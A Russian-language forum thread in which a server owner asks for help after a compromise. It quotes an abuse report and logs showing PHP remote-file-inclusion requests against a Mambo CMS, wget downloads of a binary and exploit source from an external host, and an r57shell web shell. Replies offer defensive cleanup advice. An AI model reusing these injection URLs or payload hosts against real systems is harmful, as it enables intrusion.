|
|
|
jd7710 |
|
|||
Новичок Профиль Группа: Участник Сообщений: 25 Регистрация: 24.7.2006 Репутация: нет Всего: нет |
Получил странный емайл :
The log included below shows an PHP remote file inclusion attempt from > 83.XX.XX.XX.XX (МОЙ IP) > an IP address in one of your netblocks. > > The IP address of the system reporting this attack is 72.XX.XX.XX.XX > Destination port for all entries is TCP/80. > Times listed are UTC and are accurate. > > It is likely that the machine having IP address 83.XX.XX.XX.XX is itself > compromised, > and is launching this same attack against many other systems besides ours. > > Please deal with this incident in accordance with your Acceptable Use > Policy. > > Thank You > > [email protected] > > 72.XX.XX.XX.XX (essexhosting.net) Server Log: > > 83.XX.XX.XX.XX - - [10/May/2008:21:28:05 +0000] "GET > //initiate.php?abs_path=http://www.guardmusic.com/echo.txt? HTTP/1.1" 403 > 481 "-" "libwww-perl/5.803" (malwarebytes.org) "-" > 83.XX.XX.XX.XX - - [10/May/2008:22:01:48 +0000] "GET > /forums/index.php?showtopic=1680//initiate.php?abs_path=http://www.guardmusi > c.com/echo.txt? HTTP/1.1" 403 484 "-" "libwww-perl/5.803" (malwarebytes.org) > "-" > 83.XX.XX.XX.XX - - [10/May/2008:22:01:49 +0000] "GET > /forums//initiate.php?abs_path=http://www.guardmusic.com/echo.txt? HTTP/1.1" > 403 488 "-" "libwww-perl/5.803" (malwarebytes.org) "-" Объясните пожалуйста что же все таки вытворял мой сервак? и что мне предпринять? |
|||
|
||||
Feldmarschall |
|
|||
Новичок Профиль Группа: Участник Сообщений: 2641 Регистрация: 11.12.2007 Репутация: 1 Всего: 32 |
поменять пароль на фтп и поставить на домашнюю тачку антивирус.
ысерваки сейчас никто не ломает. куда проще подсунуть трояна любителям порнушки =) |
|||
|
||||
jd7710 |
|
|||
Новичок Профиль Группа: Участник Сообщений: 25 Регистрация: 24.7.2006 Репутация: нет Всего: нет |
пароли уже сменил, а вот с антивирусом будет посложнее...сервак не домашний)))
|
|||
|
||||
Vasay |
|
|||
Эксперт Профиль Группа: Завсегдатай Сообщений: 2097 Регистрация: 8.3.2006 Репутация: нет Всего: 73 |
jd7710, Антивирус надо ставить на домашний комп. Так как скорей всего вирус сидит у тебя и просто мониторит коннекты по ftp и ssh и отсылает пароли хозяину.
Еще неплохо бы сервер проверить на наличие руткитов. Есть такая штука: http://www.rootkit.nl/projects/rootkit_hunter.html мне как-то рекомендовали, но я не использовал, так как выяснилось, что взлом произошел из-за трояна хакнувшего тоталкоммандер человека имевшего ftp доступ к серверу. -------------------- Придумать идеальную защиту от дурака невозможно, дураки, наудивление, изобретательны. |
|||
|
||||
jd7710 |
|
|||
Новичок Профиль Группа: Участник Сообщений: 25 Регистрация: 24.7.2006 Репутация: нет Всего: нет |
проверил руткитом (Rootkit Hunter version 1.3.2)
выдал вот такую инфу : [21:35:19] Starting system checks... [21:36:20] Performing file properties checks [21:36:21] Info: Starting test name 'properties' [21:36:21] Warning: Checking for prerequisites [ Warning ] [21:36:22] The file of stored file properties (rkhunter.dat) does not exist, and so must be created. To do this type in 'rkhunter --propupd'. [21:36:22] [21:36:22] Warning: WARNING! It is the users responsibility to ensure that when the '--propupd' option is used, all the files on their system are known to be genuine, and installed from a reliable source. The rkhunter '--check' option will compare the current file properties against previously stored values, and report if any values differ. However, rkhunter cannot determine what has caused the change, that is for the user to do. [21:36:35] /bin/egrep [ Warning ] [21:36:36] Warning: The command '/bin/egrep' has been replaced by a script: /bin/egrep: Bourne shell script text executable [21:36:38] /bin/fgrep [ Warning ] [21:36:39] Warning: The command '/bin/fgrep' has been replaced by a script: /bin/fgrep: Bourne shell script text executable [21:37:25] /usr/bin/groups [ Warning ] [21:37:25] Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable [21:37:35] /usr/bin/ldd [ Warning ] [21:37:35] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne-Again shell script text executable [21:38:18] /usr/bin/which [ Warning ] [21:38:19] Warning: The command '/usr/bin/which' has been replaced by a script: /usr/bin/which: Bourne shell script text executable [21:38:24] /usr/bin/lwp-request [ Warning ] [21:38:24] Warning: The command '/usr/bin/lwp-request' has been replaced by a script: /usr/bin/lwp-request: perl script text executable [21:38:45] /usr/sbin/adduser [ Warning ] [21:38:46] Warning: The command '/usr/sbin/adduser' has been replaced by a script: /usr/sbin/adduser: perl script text executable [21:46:32] Performing trojan specific checks [21:46:32] Info: Starting test name 'trojans' [21:46:32] Info: Using inetd configuration file '/etc/inetd.conf' [21:46:33] Checking for enabled inetd services [ Warning ] [21:46:34] Warning: Found enabled inetd service: finger [21:46:34] Warning: Found enabled inetd service: ident [21:46:36] Performing Linux specific checks [21:46:37] Info: Starting test name 'os_specific' [21:46:37] Checking kernel module commands [ Warning ] [21:46:38] Warning: No output found from the lsmod command or the /proc/modules file: [21:46:38] /proc/modules output: [21:46:39] lsmod output: [21:46:39] Info: Using modules pathname of '/lib/modules' [21:52:33] Info: Starting test name 'passwd_changes' [21:52:34] Checking for passwd file changes [ Warning ] [21:52:34] Warning: Users have been added to the passwd file: [21:52:35] web1:x:648:648::/home/www/web1:/bin/false [21:52:35] Info: Starting test name 'group_changes' [21:52:36] Checking for group file changes [ Warning ] [21:52:36] Warning: Groups have been added to the group file: [21:52:37] ftponly:x:501:web0,web1,web2,web3 [21:52:37] web1:x:648: [21:52:38] Warning: Groups have been removed from the group file: [21:52:38] ftponly:x:501:web0,web2,web3 [21:52:42] Checking if SSH root access is allowed [ Warning ] [21:52:43] Warning: The SSH and rkhunter configuration options should be the same: [21:52:43] SSH configuration option 'PermitRootLogin': yes [21:52:43] Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no [21:52:44] Checking if SSH protocol v1 is allowed [ Warning ] [21:52:44] Warning: SSH protocol version 1 has been enabled in the SSH configuration file (/etc/ssh/sshd_config). [21:52:49] Checking /dev for suspicious file types [ Warning ] [21:52:50] Warning: Suspicious file types found in /dev: [21:52:50] /dev/shm/network/ifstate: ASCII text [21:56:49] Checking version of OpenSSL [ Warning ] [21:56:49] Warning: Application 'openssl', version '0.9.7e', is out of date, and possibly a security risk на сколько все запущенно? есть шанс все исправить или надо сервак заново инсталировать? |
|||
|
||||
Exaktus |
|
|||
Шустрый Профиль Группа: Участник Сообщений: 135 Регистрация: 15.4.2007 Репутация: 3 Всего: 4 |
--------------------
Ничто так не бодрит по утрам, как свежеупавший сервер |
|||
|
||||
jd7710 |
|
||||
Новичок Профиль Группа: Участник Сообщений: 25 Регистрация: 24.7.2006 Репутация: нет Всего: нет |
можно немножко по подробнее |
||||
|
|||||
Vasay |
|
|||
Эксперт Профиль Группа: Завсегдатай Сообщений: 2097 Регистрация: 8.3.2006 Репутация: нет Всего: 73 |
jd7710,
Запости сюда вывод команды cat /bin/fgrep (т.е. содержание файла /bin/fgrep) -------------------- Придумать идеальную защиту от дурака невозможно, дураки, наудивление, изобретательны. |
|||
|
||||
jd7710 |
|
|||
Новичок Профиль Группа: Участник Сообщений: 25 Регистрация: 24.7.2006 Репутация: нет Всего: нет |
|
|||
|
||||
Vasay |
|
|||
Эксперт Профиль Группа: Завсегдатай Сообщений: 2097 Регистрация: 8.3.2006 Репутация: нет Всего: 73 |
jd7710,
Это нормально. Просто вызывается grep с ключом "-F" -------------------- Придумать идеальную защиту от дурака невозможно, дураки, наудивление, изобретательны. |
|||
|
||||
jd7710 |
|
|||
Новичок Профиль Группа: Участник Сообщений: 25 Регистрация: 24.7.2006 Репутация: нет Всего: нет |
проcмотрел error.log , что это значит?
sh: line 1: sysctl: command not found sh: line 1: sysctl: command not found [Wed Jun 04 14:04:07 2008] [error] [client 213.140.6.113] File does not exist: /home/www/web0/html/mambo/css, referer: http://МОЙ САЙТ/index.php?_=&_REQUEST%5boption%5d=com_content&_REQUEST%5bIteREQUESTmid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.endureros.com/modules/img/aa.gif?? [Wed Jun 04 14:04:38 2008] [error] [client 213.140.6.113] File does not exist: /home/www/web0/html/mambo/css, referer: http://МОЙ САЙТ/index.php?_=&_REQUEST%5boption%5d=com_content&_REQUEST%5bIteREQUESTmid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.endureros.com/modules/img/aa.gif?? --14:04:53-- http://reloaded-crew.t35.com/httpd => `httpd' Resolving reloaded-crew.t35.com... 66.45.237.220 Connecting to reloaded-crew.t35.com|66.45.237.220|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 219,325 (214K) [text/plain] 0K .......... .......... .......... .......... .......... 23% 96.41 KB/s 50K .......... .......... .......... .......... .......... 46% 343.25 KB/s 100K .......... .......... .......... .......... .......... 70% 295.16 KB/s 150K .......... .......... .......... .......... .......... 93% 44.39 KB/s 200K .......... .... 100% 27.82 MB/s 14:05:00 (109.24 KB/s) - `httpd' saved [219325/219325] [Wed Jun 04 14:05:01 2008] [error] [client 213.140.6.113] File does not exist: /home/www/web0/html/mambo/css, referer: http://МОЙ САЙТ/index.php?_=&_REQUEST%5boption%5d=com_content&_REQUEST%5bIteREQUESTmid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.endureros.com/modules/img/aa.gif?? --14:05:16-- http://reloaded-crew.t35.com/Fabietto/rip3.c => `rip3.c' Resolving reloaded-crew.t35.com... 66.45.237.220 Connecting to reloaded-crew.t35.com|66.45.237.220|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 20,817 (20K) [text/plain] 0K .......... .......... 100% 67.90 KB/s 14:05:17 (67.90 KB/s) - `rip3.c' saved [20817/20817] [Wed Jun 04 14:05:18 2008] [error] [client 213.140.6.113] File does not exist: /home/www/web0/html/mambo/css, referer: http://МОЙ САЙТ/index.php?_=&_REQUEST%5boption%5d=com_content&_REQUEST%5bIteREQUESTmid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.endureros.com/modules/img/aa.gif?? Если в набираю вот эту ссылку (http://МОЙ САЙТ/index.php?_=&_REQUEST%5boption%5d=com_content&_REQUEST%5bIteREQUESTmid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.endureros.com/modules/img/aa.gif?? ) грузиться сайт и внизу появлятся панель управления шела (r57shell) что делать? где его искать, сайт сливал и проверял касперским...ни чего не нашел. [/b] Это сообщение отредактировал(а) jd7710 - 13.6.2008, 22:14 |
|||
|
||||
bilbobagginz |
|
|||
Naughtius Maximus Профиль Группа: Экс. модератор Сообщений: 8813 Регистрация: 2.3.2004 Где: Israel Репутация: 2 Всего: 317 |
если "Rootkit Hunter version 1.3.2" не врёт, сервер таки ДА ломанули.
части системных програм подменили. руткит поставили детский, т.к. ты его смог обнаружить так легко. не знаю на какой системе вы работаете, есть прекрасный проект http://www.chkrootkit.org/ который тоже довольно сносно диагностирует систему. можешь ее запустить, авось найдешь еще чего. нужно сделать так: 1. зарезервировать систему (для дальнейшего изучения всех этапов атаки, и для реставрации нужных данных ) 2. создать чистую систему, с обновленным ПО, без дырок, которыми воспользовались атакующие. 3. реставрировать систему из нового, недырявого бекапа. если это хостинг, просите помощи у их security team. Добавлено через 4 минуты и 2 секунды
это похоже на какую-то програмку, которую атакующий бот скачал с сети. если у тебя был установлен компилятор, то ее наверное собрали и запустили. эта программка скорее всего дала доступ root процессу, к-рый ее запустил. и тот, собака наверное и натворил с твоей системой все эти пакости. скачай програмку сам и изучи. 20k это не маленькая программка. -------------------- Я ещё не демон. Я только учусь. |
|||
|
||||
jd7710 |
|
|||
Новичок Профиль Группа: Участник Сообщений: 25 Регистрация: 24.7.2006 Репутация: нет Всего: нет |
Спасибо всем за помощь!!
Когда брал сервак много чего не знал , а именно не сделал сразу бэкап пока система чистая была... Я думаю к провайдеру безполезно обращаться, сервак у меня забугорный)) все услуги платные...да и по русски им не объяснишь))) легче тот удалить и взять новый и делать сразу все правельно... |
|||
|
||||
Feldmarschall |
|
|||
Новичок Профиль Группа: Участник Сообщений: 2641 Регистрация: 11.12.2007 Репутация: 1 Всего: 32 |
jd7710, судя по этим логам, у тебя сайт построен на базе кривой, но популярной CMS.
В CMS есть дыра. Через эту дыру тебе на сайт заливают трояна |
|||
|
||||
jd7710 |
|
|||
Новичок Профиль Группа: Участник Сообщений: 25 Регистрация: 24.7.2006 Репутация: нет Всего: нет |
Стоит мамба параноя, буду теперь менять на другую версию найти самому дыру в CMS просто не хватит времени и мозгов |
|||
|
||||
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей) | |
0 Пользователей: | |
« Предыдущая тема | Администрирование Web серверов и Web служб | Следующая тема » |
|
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности Powered by Invision Power Board(R) 1.3 © 2003 IPS, Inc. |